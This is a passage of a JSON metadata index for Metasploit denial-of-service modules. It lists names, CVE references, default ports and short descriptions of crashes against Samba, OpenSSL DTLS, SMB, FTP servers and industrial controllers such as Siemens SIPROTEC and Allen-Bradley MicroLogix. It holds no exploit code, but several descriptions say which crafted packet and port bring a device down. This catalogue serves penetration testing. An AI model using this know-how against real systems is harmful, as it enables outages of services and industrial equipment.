"autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb", - "is_install_path": true, - "ref_name": "dos/ntp/ntpd_reserved_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/pptp/ms02_063_pptp_dos": { - "name": "MS02-063 PPTP Malformed Control Data Kernel Denial of Service", - "fullname": "auxiliary/dos/pptp/ms02_063_pptp_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2002-09-26", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module exploits a kernel based overflow when sending abnormal PPTP Control Data\n packets\tto Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers\n (Remote Access Services). Kernel memory is overwritten resulting in a BSOD.\n Code execution may be possible however this module is only a DoS.", - "references": [ - "BID-5807", - "CVE-2002-1214", - "OSVDB-13422", - "MSB-MS02-063" - ], - "platform": "", - "arch": "", - "rport": 1723, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb", - "is_install_path": true, - "ref_name": "dos/pptp/ms02_063_pptp_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/rpc/rpcbomb": { - "name": "RPC DoS targeting *nix rpcbind/libtirpc", - "fullname": "auxiliary/dos/rpc/rpcbomb", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "guidovranken", - "Pearce Barry " - ], - "description": "This module exploits a vulnerability in certain versions of\n rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger\n large (and never freed) memory allocations for XDR strings on\n the target.", - "references": [ - "CVE-2017-8779", - "BID-98325", - "URL-http://openwall.com/lists/oss-security/2017/05/03/12" - ], - "platform": "", - "arch": "", - "rport": 111, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/rpc/rpcbomb.rb", - "is_install_path": true, - "ref_name": "dos/rpc/rpcbomb", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/samba/lsa_addprivs_heap": { - "name": "Samba lsa_io_privilege_set Heap Overflow", - "fullname": "auxiliary/dos/samba/lsa_addprivs_heap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.", - "references": [ - "CVE-2007-2446", - "OSVDB-34699" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb", - "is_install_path": true, - "ref_name": "dos/samba/lsa_addprivs_heap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/samba/lsa_transnames_heap": { - "name": "Samba lsa_io_trans_names Heap Overflow", - "fullname": "auxiliary/dos/samba/lsa_transnames_heap", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon.", - "references": [ - "CVE-2007-2446", - "OSVDB-34699" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/samba/lsa_transnames_heap.rb", - "is_install_path": true, - "ref_name": "dos/samba/lsa_transnames_heap", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/samba/read_nttrans_ea_list": { - "name": "Samba read_nttrans_ea_list Integer Overflow", - "fullname": "auxiliary/dos/samba/read_nttrans_ea_list", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Jeremy Allison", - "dz_lnly" - ], - "description": "Integer overflow in the read_nttrans_ea_list function in nttrans.c in\n smbd in Samba 3.x before 3.5.22, 3.6.x before 3.6.17, and 4.x before\n 4.0.8 allows remote attackers to cause a denial of service (memory\n consumption) via a malformed packet. Important Note: in order to work,\n the \"ea support\" option on the target share must be enabled.", - "references": [ - "OSVDB-95969", - "BID-61597", - "EDB-27778", - "CVE-2013-4124" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2021-01-28 10:35:25 +0000", - "path": "/modules/auxiliary/dos/samba/read_nttrans_ea_list.rb", - "is_install_path": true, - "ref_name": "dos/samba/read_nttrans_ea_list", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/sap/sap_soap_rfc_eps_delete_file": { - "name": "SAP SOAP EPS_DELETE_FILE File Deletion", - "fullname": "auxiliary/dos/sap/sap_soap_rfc_eps_delete_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Alexey Sintsov", - "nmonkee" - ], - "description": "This module abuses the SAP NetWeaver EPS_DELETE_FILE function, on the SAP SOAP\n RFC Service, to delete arbitrary files on the remote file system. The module can\n also be used to capture SMB hashes by using a fake SMB share as DIRNAME.", - "references": [ - "OSVDB-74780", - "URL-http://dsecrg.com/pages/vul/show.php?id=331", - "URL-https://launchpad.support.sap.com/#/notes/1554030" - ], - "platform": "", - "arch": "", - "rport": 8000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/sap/sap_soap_rfc_eps_delete_file.rb", - "is_install_path": true, - "ref_name": "dos/sap/sap_soap_rfc_eps_delete_file", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/scada/allen_bradley_pccc": { - "name": "DoS Exploitation of Allen-Bradley's Legacy Protocol (PCCC)", - "fullname": "auxiliary/dos/scada/allen_bradley_pccc", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "José Diogo Monteiro ", - "Luis Rosa ", - "Miguel Borges de Freitas " - ], - "description": "A remote, unauthenticated attacker could send a single, specially crafted\n Programmable Controller Communication Commands (PCCC) packet to the controller\n that could potentially cause the controller to enter a DoS condition.\n MicroLogix 1100 controllers are affected: 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and\n 1763-L16DWD.\n CVE-2017-7924 has been assigned to this vulnerability.\n A CVSS v3 base score of 7.5 has been assigned.", - "references": [ - "CVE-2017-7924", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-17-138-03", - "URL-http://web.archive.org/web/20250116210051/https://dl.acm.org/doi/10.1145/3174776.3174780" - ], - "platform": "", - "arch": "", - "rport": 44818, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/dos/scada/allen_bradley_pccc.rb", - "is_install_path": true, - "ref_name": "dos/scada/allen_bradley_pccc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/scada/beckhoff_twincat": { - "name": "Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS", - "fullname": "auxiliary/dos/scada/beckhoff_twincat", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-09-13", - "type": "auxiliary", - "author": [ - "Luigi Auriemma", - "jfa" - ], - "description": "The Beckhoff TwinCAT version <= 2.11.0.2004 can be brought down by sending\n a crafted UDP packet to port 48899 (TCATSysSrv.exe).", - "references": [ - "CVE-2011-3486", - "OSVDB-75495", - "URL-http://aluigi.altervista.org/adv/twincat_1-adv.txt" - ], - "platform": "", - "arch": "", - "rport": 48899, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/scada/beckhoff_twincat.rb", - "is_install_path": true, - "ref_name": "dos/scada/beckhoff_twincat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/scada/d20_tftp_overflow": { - "name": "General Electric D20ME TFTP Server Buffer Overflow DoS", - "fullname": "auxiliary/dos/scada/d20_tftp_overflow", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-01-19", - "type": "auxiliary", - "author": [ - "K. Reid Wightman ", - "todb " - ], - "description": "By sending a malformed TFTP request to the GE D20ME, it is possible to crash the\n device.\n\n This module is based on the original 'd20ftpbo.rb' Basecamp module from\n DigitalBond.", - "references": [ - "URL-http://www.digitalbond.com/tools/basecamp/metasploit-modules/" - ], - "platform": "", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2021-01-28 10:35:25 +0000", - "path": "/modules/auxiliary/dos/scada/d20_tftp_overflow.rb", - "is_install_path": true, - "ref_name": "dos/scada/d20_tftp_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/scada/igss9_dataserver": { - "name": "7-Technologies IGSS 9 IGSSdataServer.exe DoS", - "fullname": "auxiliary/dos/scada/igss9_dataserver", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-12-20", - "type": "auxiliary", - "author": [ - "jfa" - ], - "description": "The 7-Technologies SCADA IGSS Data Server (IGSSdataServer.exe) <= 9.0.0.10306 can be\n brought down by sending a crafted TCP packet to port 12401. This should also work\n for version <= 9.0.0.1120, but that version hasn't been tested.", - "references": [ - "CVE-2011-4050", - "OSVDB-77976", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-335-01" - ], - "platform": "", - "arch": "", - "rport": 12401, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/scada/igss9_dataserver.rb", - "is_install_path": true, - "ref_name": "dos/scada/igss9_dataserver", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/scada/siemens_siprotec4": { - "name": "Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service", - "fullname": "auxiliary/dos/scada/siemens_siprotec4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "M. Can Kurnaz" - ], - "description": "This module sends a specially crafted packet to port 50000/UDP\n causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.\n A manual reboot is required to return the device to service.\n CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.", - "references": [ - "EDB-44103", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-15-202-01" - ], - "platform": "", - "arch": "", - "rport": 50000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/scada/siemens_siprotec4.rb", - "is_install_path": true, - "ref_name": "dos/scada/siemens_siprotec4", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/scada/yokogawa_logsvr": { - "name": "Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow", - "fullname": "auxiliary/dos/scada/yokogawa_logsvr", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-10", - "type": "auxiliary", - "author": [ - "juan vazquez ", - "Redsadic " - ], - "description": "This module abuses a buffer overflow vulnerability to trigger a Denial of Service\n of the BKCLogSvr component in the Yokogaca CENTUM CS 3000 product. The vulnerability\n exists in the handling of malformed log packets, with an unexpected long level field.\n The root cause of the vulnerability is a combination of usage of uninitialized memory\n from the stack and a dangerous string copy. This module has been tested successfully\n on Yokogawa CENTUM CS 3000 R3.08.50.", - "references": [ - "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf", - "URL-http://web.archive.org/web/20221209030848/https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities/", - "CVE-2014-0781" - ], - "platform": "", - "arch": "", - "rport": 52302, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/dos/scada/yokogawa_logsvr.rb", - "is_install_path": true, - "ref_name": "dos/scada/yokogawa_logsvr", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/smb/smb_loris": { - "name": "SMBLoris NBSS Denial of Service", - "fullname": "auxiliary/dos/smb/smb_loris", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-06-29", - "type": "auxiliary", - "author": [ - "thelightcosine", - "Adam Cammack " - ], - "description": "The SMBLoris attack consumes large chunks of memory in the target by sending\n SMB requests with the NetBios Session Service(NBSS) Length Header value set\n to the maximum possible value. By keeping these connections open and initiating\n large numbers of these sessions, the memory does not get freed, and the server\n grinds to a halt. This vulnerability was originally disclosed by Sean Dillon\n and Zach Harding.\n\n DISCALIMER: This module opens a lot of simultaneous connections. Please check\n your system's ULIMIT to make sure it can handle it. This module will also run\n continuously until stopped.", - "references": [ - "URL-https://web.archive.org/web/20170804072329/https://smbloris.com/", - "AKA-SMBLoris" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/smb/smb_loris.rb", - "is_install_path": true, - "ref_name": "dos/smb/smb_loris", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/smtp/sendmail_prescan": { - "name": "Sendmail SMTP Address prescan Memory Corruption", - "fullname": "auxiliary/dos/smtp/sendmail_prescan", - "aliases": [], - "rank": 300, - "disclosure_date": "2003-09-17", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This is a proof of concept denial of service module for Sendmail versions\n 8.12.8 and earlier. The vulnerability is within the prescan() method when\n parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00\n bytes can be used, limiting the likelihood for arbitrary code execution.", - "references": [ - "OSVDB-2577", - "CVE-2003-0694", - "BID-8641", - "EDB-24" - ], - "platform": "", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": null, - "mod_time": "2023-01-04 14:45:58 +0000", - "path": "/modules/auxiliary/dos/smtp/sendmail_prescan.rb", - "is_install_path": true, - "ref_name": "dos/smtp/sendmail_prescan", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/solaris/lpd/cascade_delete": { - "name": "Solaris LPD Arbitrary File Delete", - "fullname": "auxiliary/dos/solaris/lpd/cascade_delete", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm ", - "Optyx " - ], - "description": "This module uses a vulnerability in the Solaris line printer\n daemon to delete arbitrary files on an affected system. This\n can be used to exploit the rpc.walld format string flaw, the\n missing krb5.conf authentication bypass, or simply delete\n system files. Tested on Solaris 2.6, 7, 8, 9, and 10.", - "references": [ - "CVE-2005-4797", - "BID-14510", - "OSVDB-18650" - ], - "platform": "", - "arch": "", - "rport": 515, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb", - "is_install_path": true, - "ref_name": "dos/solaris/lpd/cascade_delete", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/ssl/dtls_changecipherspec": { - "name": "OpenSSL DTLS ChangeCipherSpec Remote DoS", - "fullname": "auxiliary/dos/ssl/dtls_changecipherspec", - "aliases": [], - "rank": 300, - "disclosure_date": "2000-04-26", - "type": "auxiliary", - "author": [ - "Jon Oberheide ", - "theLightCosine " - ], - "description": "This module performs a Denial of Service Attack against Datagram TLS in OpenSSL\n version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a\n ChangeCipherspec Datagram before a ClientHello.", - "references": [ - "CVE-2009-1386", - "OSVDB-55073" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb", - "is_install_path": true, - "ref_name": "dos/ssl/dtls_changecipherspec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/ssl/dtls_fragment_overflow": { - "name": "OpenSSL DTLS Fragment Buffer Overflow DoS", - "fullname": "auxiliary/dos/ssl/dtls_fragment_overflow", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-06-05", - "type": "auxiliary", - "author": [ - "Juri Aedla ", - "Jon Hart " - ], - "description": "This module performs a Denial of Service Attack against Datagram TLS in\n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.\n This occurs when a DTLS ClientHello message has multiple fragments and the\n fragment lengths of later fragments are larger than that of the first, a\n buffer overflow occurs, causing a DoS.", - "references": [ - "CVE-2014-0195", - "ZDI-14-173", - "BID-67900", - "URL-http://web.archive.org/web/20150815024234/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002", - "URL-http://web.archive.org/web/20140707160621/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048" - ], - "platform": "", - "arch": "", - "rport": 4433, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb", - "is_install_path": true, - "ref_name": "dos/ssl/dtls_fragment_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/ssl/openssl_aesni": { - "name": "OpenSSL TLS 1.1 and 1.2 AES-NI DoS", - "fullname": "auxiliary/dos/ssl/openssl_aesni", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-02-05", - "type": "auxiliary", - "author": [ - "Wolfgang Ettlinger " - ], - "description": "The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the\n length of an encrypted message when used with a TLS version 1.1 or above. This\n leads to an integer underflow which can cause a DoS. The vulnerable function\n aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.\n This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default\n OpenSSL 1.0.1c package.", - "references": [ - "CVE-2012-2686", - "URL-https://www.openssl.org/news/secadv/20130205.txt" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/ssl/openssl_aesni.rb", - "is_install_path": true, - "ref_name": "dos/ssl/openssl_aesni", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/syslog/rsyslog_long_tag": { - "name": "rsyslog Long Tag Off-By-Two DoS", - "fullname": "auxiliary/dos/syslog/rsyslog_long_tag", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-09-01", - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module triggers an off-by-two overflow in the\n rsyslog daemon. This flaw is unlikely to yield code execution\n but is effective at shutting down a remote log daemon. This bug\n was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5.\n Compiler differences may prevent this bug from causing any\n noticeable result on many systems (RHEL6 is affected).", - "references": [ - "CVE-2011-3200", - "URL-https://www.rsyslog.com/potential-dos-with-malformed-tag/", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=727644" - ], - "platform": "", - "arch": "", - "rport": 514, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb", - "is_install_path": true, - "ref_name": "dos/syslog/rsyslog_long_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/tcp/claymore_dos": { - "name": "Claymore Dual GPU Miner Format String dos attack", - "fullname": "auxiliary/dos/tcp/claymore_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-02-06", - "type": "auxiliary", - "author": [ - "res1n", - "bluebird" - ], - "description": "Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing\n a denial of service.", - "references": [ - "CVE-2018-6317", - "EDB-43972", - "URL-https://github.com/nanopool/Claymore-Dual-Miner" - ], - "platform": "", - "arch": "", - "rport": 3333, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2021-05-17 17:04:49 +0000", - "path": "/modules/auxiliary/dos/tcp/claymore_dos.py", - "is_install_path": true, - "ref_name": "dos/tcp/claymore_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/tcp/junos_tcp_opt": { - "name": "Juniper JunOS Malformed TCP Option", - "fullname": "auxiliary/dos/tcp/junos_tcp_opt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "todb " - ], - "description": "This module exploits a denial of service vulnerability\n in Juniper Network's JunOS router operating system. By sending a TCP\n packet with TCP option 101 set, an attacker can cause an affected\n router to reboot.", - "references": [ - "BID-37670", - "OSVDB-61538", - "URL-http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/tcp/junos_tcp_opt.rb", - "is_install_path": true, - "ref_name": "dos/tcp/junos_tcp_opt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/tcp/synflood": { - "name": "TCP SYN Flooder", - "fullname": "auxiliary/dos/tcp/synflood", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "A simple TCP SYN flooder", - "references": [], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/tcp/synflood.rb", - "is_install_path": true, - "ref_name": "dos/tcp/synflood", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/upnp/miniupnpd_dos": { - "name": "MiniUPnPd 1.4 Denial of Service (DoS) Exploit", - "fullname": "auxiliary/dos/upnp/miniupnpd_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-03-27", - "type": "auxiliary", - "author": [ - "hdm ", - "Dejan Lukan" - ], - "description": "This module allows remote attackers to cause a denial of service (DoS)\n in MiniUPnP 1.0 server via a specifically crafted UDP request.", - "references": [ - "CVE-2013-0229", - "OSVDB-89625", - "BID-57607", - "URL-https://www.rapid7.com/blog/post/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play/", - "URL-https://www.hdm.io/writing/SecurityFlawsUPnP.pdf" - ], - "platform": "", - "arch": "", - "rport": 1900, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-12-04 17:41:24 +0000", - "path": "/modules/auxiliary/dos/upnp/miniupnpd_dos.rb", - "is_install_path": true, - "ref_name": "dos/upnp/miniupnpd_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/appian/appian_bpm": { - "name": "Appian Enterprise Business Suite 5.6 SP1 DoS", - "fullname": "auxiliary/dos/windows/appian/appian_bpm", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-12-17", - "type": "auxiliary", - "author": [ - "guiness.stout " - ], - "description": "This module exploits a denial of service flaw in the Appian\n Enterprise Business Suite service.", - "references": [ - "CVE-2007-6509", - "OSVDB-39500", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2007-12/0440.html" - ], - "platform": "", - "arch": "", - "rport": 5400, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/appian/appian_bpm.rb", - "is_install_path": true, - "ref_name": "dos/windows/appian/appian_bpm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/browser/ms09_065_eot_integer": { - "name": "Microsoft Windows EOT Font Table Directory Integer Overflow", - "fullname": "auxiliary/dos/windows/browser/ms09_065_eot_integer", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-11-10", - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module exploits an integer overflow flaw in the Microsoft Windows Embedded\n OpenType font parsing code located in win32k.sys. Since the kernel itself parses\n embedded web fonts, it is possible to trigger a BSoD from a normal web page when\n viewed with Internet Explorer.", - "references": [ - "CVE-2009-2514", - "MSB-MS09-065", - "OSVDB-59869" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb", - "is_install_path": true, - "ref_name": "dos/windows/browser/ms09_065_eot_integer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_dos/windows/ftp/filezilla_admin_user": { - "name": "FileZilla FTP Server Admin Interface Denial of Service", - "fullname": "auxiliary/dos/windows/ftp/filezilla_admin_user", - "aliases": [], - "rank": 300, - "disclosure_date": "2005-11-07", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server Administration Interface in versions 0.9.4d and earlier.\n By sending a procession of excessively long USER commands to the FTP\n Server, the Administration Interface (FileZilla Server Interface.exe)\n when running, will overwrite the stack with our string and generate an\n exception. The FileZilla FTP Server itself will continue functioning.", - "references": [ - "BID-15346", - "CVE-2005-3589", - "EDB-1336", - "OSVDB-20817" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/filezilla_admin_user", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/filezilla_server_port": { - "name": "FileZilla FTP Server Malformed PORT Denial of Service", - "fullname": "auxiliary/dos/windows/ftp/filezilla_server_port", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-12-11", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server versions 0.9.21 and earlier. By sending a malformed PORT command\n then LIST command, the server attempts to write to a NULL pointer.", - "references": [ - "BID-21542", - "BID-21549", - "CVE-2006-6565", - "EDB-2914", - "OSVDB-34435" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/filezilla_server_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/guildftp_cwdlist": { - "name": "Guild FTPd 0.999.8.11/0.999.14 Heap Corruption", - "fullname": 